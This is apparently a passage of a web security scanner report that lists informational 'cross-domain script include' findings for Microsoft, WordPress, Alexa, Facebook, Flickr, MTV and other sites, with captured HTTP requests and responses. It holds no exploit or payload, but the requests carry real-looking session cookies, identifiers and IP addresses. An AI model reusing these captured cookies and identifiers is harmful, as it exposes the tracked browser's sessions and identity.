<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
...[SNIP]...
<div id="atdmt" style="display:none">
<script src="https://view.atdmt.com/jaction/UMIRF_FY11_IE9_Download_Button" type="text/javascript"></script>
<script src="https://view.atdmt.com/jaction/UMIRF_FY11_IE9_WWS_Page" type="text/javascript"></script>
...[SNIP]...
19.23. http://windows.microsoft.com/en-US/internet-explorer/products/ie/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windows.microsoft.com
Path:   /en-US/internet-explorer/products/ie/home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-US/internet-explorer/products/ie/home HTTP/1.1
Host: windows.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/ie
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62931
Content-Type: text/html
Expires: Tue, 14 Jun 2011 00:44:11 GMT
Last-Modified: Wed, 09 Feb 2011 14:37:32 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-UA-Compatible: IE=9
Date: Tue, 14 Jun 2011 00:34:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
...[SNIP]...
<div id="atdmt" style="display:none">
<script src="https://view.atdmt.com/jaction/UMIRF_FY11_IE9_Home_Page" type="text/javascript"></script>
...[SNIP]...
19.24. http://wordpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wordpress.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: wordpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 14 Jun 2011 00:28:37 +0000
Cache-Control: max-age=188, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://wordpress.com/xmlrpc.php
Link: <http://wp.me/1>; rel=shortlink
X-nananana: Batcache
Content-Length: 36027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><!--
   generated
...[SNIP]...
<link rel='stylesheet' id='tabs_css-css' href='http://s0.wp.com/wp-content/themes/h4/tabs/tab.css?m=1305057001g&#038;ver=MU' type='text/css' media='all' />
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305825971g&amp;ver=1.6.1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/h4/js/scripts.js?m=1305137406g&amp;ver=MU'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/themes/h4/tabs/tab.js?m=1305923105g&amp;ver=20110520b'></script>
...[SNIP]...
</script>
<script src="//cdn.optimizely.com/js/7144006.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?v&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1298424233g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
19.25. http://www.alexa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.alexa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1307189053; __utmz=115222615.1307189057.1.1.utmcsr=abouturl.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=115222615.2052008441.1307189057.1307189057.1307189057.1

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Set-Cookie: rpt=%21; expires=Wed, 15-Jun-2011 01:28:41 GMT; domain=alexa.com
Set-Cookie: lv=1308011321; expires=Wed, 13-Jun-2012 06:28:41 GMT; path=/; domain=alexa.com
Vary: Accept-Encoding
Content-Length: 16431
Connection: close
Date: Tue, 14 Jun 2011 00:28:41 GMT
Server: httpd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
<!-- END GOOGLE ANALYTICS -->
<script type="text/javascript" language="JavaScript" src="http://js.alexametrics.com/atrk.js"></script>
...[SNIP]...
19.26. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.55
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 11488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js"></script>
...[SNIP]...
19.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337b746ac%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.32
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 8896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/eptfJSfAjrr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/Ou0QNrclV2b.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/uzHjjRskdHc.js"></script>
...[SNIP]...
19.28. http://www.flickr.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:06 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 14 Jun 2011 00:03:42 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Served-By: www125.flickr.mud.yahoo.com
x-flickr-static: 1
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r06.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r16.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 148981

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Welcome to Flickr - Photo Sharing</title>

   <script data-script-purpose="page_timing">
   var page_timing = {}; page_timing.modules = {}; page_timing.
...[SNIP]...
</script>
       <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7"></script>
...[SNIP]...
19.29. http://www.flickr.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /about/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:29 GMT; path=/; domain=.flickr.com
X-Served-By: www14.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r23.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 70254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>About Flickr</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta na
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.18"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600056&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...
19.30. http://www.flickr.com/abuse/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /abuse/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /abuse/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
Content-Length: 66
Cache-Control: max-age=0
Origin: http://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

goback=http%3A%2F%2Fwww.flickr.com%2Fabout%2F&abusecat=abuse_other

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:24:44 GMT; path=/; domain=.flickr.com
X-Served-By: www69.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r11.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r20.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 56237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.18"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600122&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...
19.31. http://www.flickr.com/apps/badge/badge_iframe.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www150.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r09.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r14.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62864.18"></script>
...[SNIP]...
19.32. http://www.flickr.com/report_abuse.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /report_abuse.gne

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:44 GMT; path=/; domain=.flickr.com
X-Served-By: www23.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r20.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 53534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.18"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600122&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...
19.33. http://www.livewithoscar.com/Calendar.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Calendar.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Calendar.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:56 GMT
Content-Length: 20681

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</table><script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo/yahoo-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/get/get-min.js"></script><script type="text/javascript" src="http://www.forexfactory.com/clientscript/vbulletin_syndication_ext.js"></script>
...[SNIP]...
19.34. http://www.mtv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65
If-None-Match: 728d2711397fbbe1aed2d7d950ac94a3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: c38777ea53e9ab59c7afcca9aa8c77a7
Vary: User-Agent
Vary: Accept-Encoding
Cache-Control: max-age=135
Date: Tue, 14 Jun 2011 00:28:43 GMT
Content-Length: 165248
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

